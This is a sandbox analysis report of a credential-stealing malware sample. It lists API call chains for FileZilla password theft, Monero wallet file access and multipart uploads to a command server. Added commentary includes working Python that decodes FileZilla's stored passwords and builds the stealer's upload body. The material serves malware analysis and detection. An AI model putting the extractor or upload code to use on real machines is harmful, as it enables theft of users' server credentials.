                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 945d3b42aae2dd1056e3eda32c0065661fa34d83c80665a7de36308f80cfe631
                              • Instruction ID: 671f6d55d3368a982aaac860c2b5ce166ac5a7f6a006bf3bd7de906a0cd78f39
                              • Opcode Fuzzy Hash: 945d3b42aae2dd1056e3eda32c0065661fa34d83c80665a7de36308f80cfe631
                              • Instruction Fuzzy Hash: 5F1109B8A00209EFDB04DF98D985AAEB7B5FF88300F104599ED15A7350D774AE50CFA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: "F_p$)@7O
                              • API String ID: 0-2496068091
                              • Opcode ID: 6cb1bb38ba7f2a0565cfd804df6cee8d6a1f85240e4d7a2c57f1355f0042bddc
                              • Instruction ID: f756dd14a806a95b1e2a147775cf7eaffb4dd892d06ba631e9d2dd33f9660fa2
                              • Opcode Fuzzy Hash: 6cb1bb38ba7f2a0565cfd804df6cee8d6a1f85240e4d7a2c57f1355f0042bddc
                              • Instruction Fuzzy Hash: D8B219F3A08204AFE314AE2DDC4567AF7E9EF94320F1A493DEAC4D7744EA3558018697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: uES
                              • API String ID: 0-2569654800
                              • Opcode ID: 0f0d9ab50c1a2e962cbe4ac207ca31add8d4175facb133ae70893c525c275589
                              • Instruction ID: 3c2f8aff65b5132c733c3d39140fd29b1ae25095faa25eba89c9ee96132edcdd
                              • Opcode Fuzzy Hash: 0f0d9ab50c1a2e962cbe4ac207ca31add8d4175facb133ae70893c525c275589
                              • Instruction Fuzzy Hash: 6871E7F3A1C7149FE318AE2DDC8577AFBE5DB94710F26863DE6C483788E93458044686
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: [-
                              • API String ID: 0-1423068511
                              • Opcode ID: d552eb6a29a658ad57f85e8dfd6de74be0d350c51caf88520aedff0faaaf17a0
                              • Instruction ID: 14a1933f287686f1e10ca39af152088a81db949fb94a7f224791631c55847e89
                              • Opcode Fuzzy Hash: d552eb6a29a658ad57f85e8dfd6de74be0d350c51caf88520aedff0faaaf17a0
                              • Instruction Fuzzy Hash: 216113F2A082046FE308AE19DC8573AB7E5EF94710F15C93DE6C9C7780E6755C018796
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0f46417dd606f789b981d13ee947d12c861a54fdce35d2af7ecc958492b70135
                              • Instruction ID: f036d27101c0119c66409f4150dccc3641de162f43f72b08fc1c120cab1a4ab4
                              • Opcode Fuzzy Hash: 0f46417dd606f789b981d13ee947d12c861a54fdce35d2af7ecc958492b70135
                              • Instruction Fuzzy Hash: B7B12AF3A081009FE7149E19DC8476AB7E6EFD8710F2AC43DEAC893748E5399C098756
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 573321ee04ae4f908bd86d8b5918ba9bb6a48244f5d52f8869dde6b69abc5541
                              • Instruction ID: 47098a8406bbaf09821af7dc565621fc6741762b836a7c74b8c38853edbd916e
                              • Opcode Fuzzy Hash: 573321ee04ae4f908bd86d8b5918ba9bb6a48244f5d52f8869dde6b69abc5541
                              • Instruction Fuzzy Hash: B561C2B39087049FE340AE29DC8066AF7E6EFD4720F2AC93DE5D487744E63499418B93
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0e34d29a5d6e61b761d7d678a462e8be208931f7c783290a8082a5929853213d
                              • Instruction ID: c4b3b8c8646cd01a2220e412f0f99e8425ce519912056ab874b491ab905528c3
                              • Opcode Fuzzy Hash: 0e34d29a5d6e61b761d7d678a462e8be208931f7c783290a8082a5929853213d
                              • Instruction Fuzzy Hash: 4E51E2F3E186105BF708592ADC8937AB6D7DBD4320F2A813DD78987788E83958068296
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 93caabaaf2f716566b43f18a669e12c1d759fed507b1debd57799386a529b94f
                              • Instruction ID: a5f409b246fa377e7b39f64c2e2f058fe8755f4bf9bcdd41b7ff87f07aefa4fd
                              • Opcode Fuzzy Hash: 93caabaaf2f716566b43f18a669e12c1d759fed507b1debd57799386a529b94f
                              • Instruction Fuzzy Hash: DC415BF3A042089BF3106D2DEC457BBF796EBD4330F1A413DE98497754E93A5D068682
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007A8E0B
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 007999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007999EC
                                • Part of subcall function 007999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00799A11
                                • Part of subcall function 007999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00799A31
                                • Part of subcall function 007999C0: ReadFile.KERNEL32(000000FF,?,00000000,0079148F,00000000), ref: 00799A5A
                                • Part of subcall function 007999C0: LocalFree.KERNEL32(0079148F), ref: 00799A90
                                • Part of subcall function 007999C0: CloseHandle.KERNEL32(000000FF), ref: 00799A9A
                                • Part of subcall function 007A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007A8E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,007B0DBA,007B0DB7,007B0DB6,007B0DB3), ref: 007A0362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007A0369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 007A0385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B0DB2), ref: 007A0393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 007A03CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B0DB2), ref: 007A03DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 007A0419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B0DB2), ref: 007A0427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 007A0463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B0DB2), ref: 007A0475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B0DB2), ref: 007A0502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B0DB2), ref: 007A051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B0DB2), ref: 007A0532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B0DB2), ref: 007A054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 007A0562
                              • lstrcat.KERNEL32(?,profile: null), ref: 007A0571
                              • lstrcat.KERNEL32(?,url: ), ref: 007A0580
                              • lstrcat.KERNEL32(?,00000000), ref: 007A0593
                              • lstrcat.KERNEL32(?,007B1678), ref: 007A05A2
                              • lstrcat.KERNEL32(?,00000000), ref: 007A05B5
                              • lstrcat.KERNEL32(?,007B167C), ref: 007A05C4
                              • lstrcat.KERNEL32(?,login: ), ref: 007A05D3
                              • lstrcat.KERNEL32(?,00000000), ref: 007A05E6
                              • lstrcat.KERNEL32(?,007B1688), ref: 007A05F5
                              • lstrcat.KERNEL32(?,password: ), ref: 007A0604
                              • lstrcat.KERNEL32(?,00000000), ref: 007A0617
                              • lstrcat.KERNEL32(?,007B1698), ref: 007A0626
                              • lstrcat.KERNEL32(?,007B169C), ref: 007A0635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,007B0DB2), ref: 007A068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 4ea39e9887e85cd0ff66927cb1c2af07052400605c6de44a8b3c7aa7ec22a9e5
                              • Instruction ID: be254076a3904fb1bbbe7ddc9ff1592d5c1b98500f6e607b1b92c6916426f2ed
                              • Opcode Fuzzy Hash: 4ea39e9887e85cd0ff66927cb1c2af07052400605c6de44a8b3c7aa7ec22a9e5
                              • Instruction Fuzzy Hash: B6D14271D10108EBCB44EBF4DD5AEEE7378AF99300F508619F502A6091EF3CAA45DB62
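The API and string list of this function (StrStrA over <Host>, <Port>, <User> and <Pass encoding="base64">, followed by a lstrcat chain that emits browser:, profile: null, url:, login: and password:) is FileZilla's recentservers.xml being harvested. The Python below is an added example written for this page, not code from the sample, from Stealc or from Joe Sandbox: it parses a constructed recentservers.xml, decodes the base64-obfuscated password and renders each server in the same record layout. The ":" between host and port and the line breaks stand in for the separator literals (007B1678 and the others) that the report leaves unresolved, so those are assumptions.

```python
"""Reconstruct the FileZilla recentservers.xml harvest seen in the function
above. Added example, not code from the sample; the XML is constructed."""
import base64
import xml.etree.ElementTree as ET

# Constructed sample in the FileZilla 3.x layout (not captured from the sample).
# The second server uses a key/interactive logon and stores no <Pass> element.
SAMPLE_RECENTSERVERS = """<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>alice</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>bob</User>
      <Logontype>0</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def extract_filezilla_servers(xml_text: str) -> list[dict]:
    """Return one dict per <Server> with host, port, user and plaintext password.

    FileZilla writes the password base64-encoded (encoding="base64"). That is
    obfuscation, not encryption: anything able to read the file can decode it,
    which is exactly what the StrStrA walk in the sample relies on. Servers
    without a <Pass> element yield password=None.
    """
    root = ET.fromstring(xml_text)
    servers = []
    for srv in root.iter("Server"):
        host = srv.findtext("Host", default="")
        port = srv.findtext("Port", default="")
        user = srv.findtext("User", default="")
        password = None
        pass_el = srv.find("Pass")
        if pass_el is not None and pass_el.text:
            if pass_el.get("encoding") == "base64":
                password = base64.b64decode(pass_el.text).decode("utf-8", "replace")
            else:
                password = pass_el.text  # older FileZilla builds wrote it in the clear
        servers.append({"host": host, "port": port, "user": user, "password": password})
    return servers


def format_stealc_record(server: dict) -> str:
    """Render a server the way the lstrcat chain above assembles its record.

    Separator literals are unresolved in the report; ":" and "\\n" are assumed.
    """
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {server['host']}:{server['port']}\n"
        f"login: {server['user']}\n"
        f"password: {server['password'] if server['password'] is not None else ''}\n"
    )


if __name__ == "__main__":
    for s in extract_filezilla_servers(SAMPLE_RECENTSERVERS):
        print(format_stealc_record(s))
```

A real parser is used here instead of the substring search the sample performs; the substring approach breaks on reordered or missing elements, which is why the stealer's output for such files is often incomplete, while the record format it produces is unchanged.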
                              APIs
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 007947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00794839
                                • Part of subcall function 007947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00794849
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007959F8
                              • StrCmpCA.SHLWAPI(?,014CEA08), ref: 00795A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00795B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,014CEA38,00000000,?,014CA7F0,00000000,?,007B1A1C), ref: 00795E71
                              • lstrlen.KERNEL32(00000000), ref: 00795E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00795E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00795E9A
                              • lstrlen.KERNEL32(00000000), ref: 00795EAF
                              • lstrlen.KERNEL32(00000000), ref: 00795ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00795EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00795F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00795F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00795F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00795FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00795FBD
                              • HttpOpenRequestA.WININET(00000000,014CE958,?,014CE3D0,00000000,00000000,00400100,00000000), ref: 00795BF8
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                              • InternetCloseHandle.WININET(00000000), ref: 00795FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 2fe7a1d12457c7ae6bf10e838371e47803e2f7b1356ccf860b2e943dda5b81dc
                              • Instruction ID: 3a350efbdec3f232b3a5ba00299390bab4907376236089cf45a8ddd2143652ed
                              • Opcode Fuzzy Hash: 2fe7a1d12457c7ae6bf10e838371e47803e2f7b1356ccf860b2e943dda5b81dc
                              • Instruction Fuzzy Hash: 2D120D71920118FBDB55EBA0DC99FEEB378BF95700F5042A9B10662091EF783A49CF61
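The WinINet sequence of this function (InternetOpenA with access type 1 = INTERNET_OPEN_TYPE_DIRECT, InternetConnectA with service 3 = INTERNET_SERVICE_HTTP, HttpOpenRequestA with dwFlags 0x00400100, HttpSendRequestA, then InternetReadFile in 0xC7-byte reads until the response is exhausted), together with the `"` and `------` strings, is a hand-built multipart/form-data POST to the C2. The Python below is an added example for this page, not code from the sample or from Joe Sandbox: it names the flag bits from the constants in wininet.h, builds a body with the same boundary, reads it back in 0xC7-byte chunks the way the InternetReadFile loop does, and parses the fields out of such a body as one would from a capture. The field names and values are constructed; only the constants come from the calls shown.

```python
"""Reconstruct the HTTP side of the function above. Added example, not the
sample's code; the field names, values and boundary use are assumptions."""
from __future__ import annotations

# WinINet constants as passed in the call sequence (values from wininet.h).
INTERNET_OPEN_TYPE_DIRECT = 1            # InternetOpenA(..., 1, ...)
INTERNET_SERVICE_HTTP = 3                # InternetConnectA(..., 3, ...)
INTERNET_FLAG_KEEP_CONNECTION = 0x00400000
INTERNET_FLAG_PRAGMA_NOCACHE = 0x00000100
READ_CHUNK = 0xC7                        # InternetReadFile(..., 0xC7, ...)


def decode_http_open_flags(flags: int) -> list[str]:
    """Name the HttpOpenRequestA dwFlags bits; the sample passes 0x00400100."""
    names = {
        INTERNET_FLAG_KEEP_CONNECTION: "INTERNET_FLAG_KEEP_CONNECTION",
        INTERNET_FLAG_PRAGMA_NOCACHE: "INTERNET_FLAG_PRAGMA_NOCACHE",
        0x80000000: "INTERNET_FLAG_RELOAD",
        0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
        0x00800000: "INTERNET_FLAG_SECURE",
    }
    return [name for bit, name in names.items() if flags & bit]


def build_multipart(fields: dict[str, bytes], boundary: str = "------") -> bytes:
    """Assemble a multipart/form-data body the way a lstrcat chain would.

    Each part is "--" + boundary, a Content-Disposition header carrying the
    quoted field name (the '"' string in the report), a blank line, the value,
    and a CRLF; the body closes with "--" + boundary + "--".
    """
    parts = []
    for name, value in fields.items():
        parts.append(
            (f"--{boundary}\r\n"
             f'Content-Disposition: form-data; name="{name}"\r\n\r\n').encode()
            + value + b"\r\n"
        )
    return b"".join(parts) + f"--{boundary}--\r\n".encode()


def parse_multipart(body: bytes, boundary: str = "------") -> dict[str, bytes]:
    """Recover the fields from a captured body (e.g. carved from a PCAP).

    A short all-dash boundary like "------" is ambiguous if a value contains
    the same run of dashes; that is the sender's problem, not the parser's.
    """
    delim = f"--{boundary}".encode()
    fields: dict[str, bytes] = {}
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter reached
        head, _, value = chunk.partition(b"\r\n\r\n")
        marker = b'name="'
        start = head.find(marker)
        if start < 0:
            continue  # part without a field name; skip it
        start += len(marker)
        name = head[start:head.find(b'"', start)].decode()
        fields[name] = value.removesuffix(b"\r\n")
    return fields


def read_in_chunks(stream: bytes, chunk: int = READ_CHUNK) -> bytes:
    """Mimic the InternetReadFile loop: fixed-size reads until a read returns 0 bytes."""
    out = bytearray()
    offset = 0
    while True:
        piece = stream[offset:offset + chunk]
        if not piece:
            return bytes(out)
        out += piece
        offset += len(piece)


if __name__ == "__main__":
    print(decode_http_open_flags(0x00400100))
    demo = build_multipart({"hwid": b"ABC123", "file": b"browser: FileZilla\nprofile: null"})
    print(parse_multipart(read_in_chunks(demo)))
```

0x00400100 is INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE: keep-alive for the repeated uploads and a Pragma: no-cache header on each request. For network detection the fixed "------" boundary combined with WinINet's default User-Agent is the pair to key on; the parser above is what you run over a carved body to see which fields the sample shipped.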
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007A8B60: GetSystemTime.KERNEL32(007B0E1A,014CA850,007B05AE,?,?,007913F9,?,0000001A,007B0E1A,00000000,?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007A8B86
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0079CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0079D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0079D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 0079D208
                              • lstrcat.KERNEL32(?,007B1478), ref: 0079D217
                              • lstrcat.KERNEL32(?,00000000), ref: 0079D22A
                              • lstrcat.KERNEL32(?,007B147C), ref: 0079D239
                              • lstrcat.KERNEL32(?,00000000), ref: 0079D24C
                              • lstrcat.KERNEL32(?,007B1480), ref: 0079D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 0079D26E
                              • lstrcat.KERNEL32(?,007B1484), ref: 0079D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 0079D290
                              • lstrcat.KERNEL32(?,007B1488), ref: 0079D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 0079D2B2
                              • lstrcat.KERNEL32(?,007B148C), ref: 0079D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 0079D2D4
                              • lstrcat.KERNEL32(?,007B1490), ref: 0079D2E3
                                • Part of subcall function 007AA820: lstrlen.KERNEL32(00794F05,?,?,00794F05,007B0DDE), ref: 007AA82B
                                • Part of subcall function 007AA820: lstrcpy.KERNEL32(007B0DDE,00000000), ref: 007AA885
                              • lstrlen.KERNEL32(?), ref: 0079D32A
                              • lstrlen.KERNEL32(?), ref: 0079D339
                                • Part of subcall function 007AAA70: StrCmpCA.SHLWAPI(014C8E80,0079A7A7,?,0079A7A7,014C8E80), ref: 007AAA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 0079D3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 127822179fafde5fa1504f3cfba4c9f97ee91ac820e3be87ffd11a80032f8831
                              • Instruction ID: ae23c012761bd465ebf33bfd9ddfedf6d9e97a25b6486c4def011b593903c017
                              • Opcode Fuzzy Hash: 127822179fafde5fa1504f3cfba4c9f97ee91ac820e3be87ffd11a80032f8831
                              • Instruction Fuzzy Hash: 15E14B71950108EBCB44EBA0DD9AEEE7378BF95300F504269F107A6091DF3CAE59DB62
                              APIs
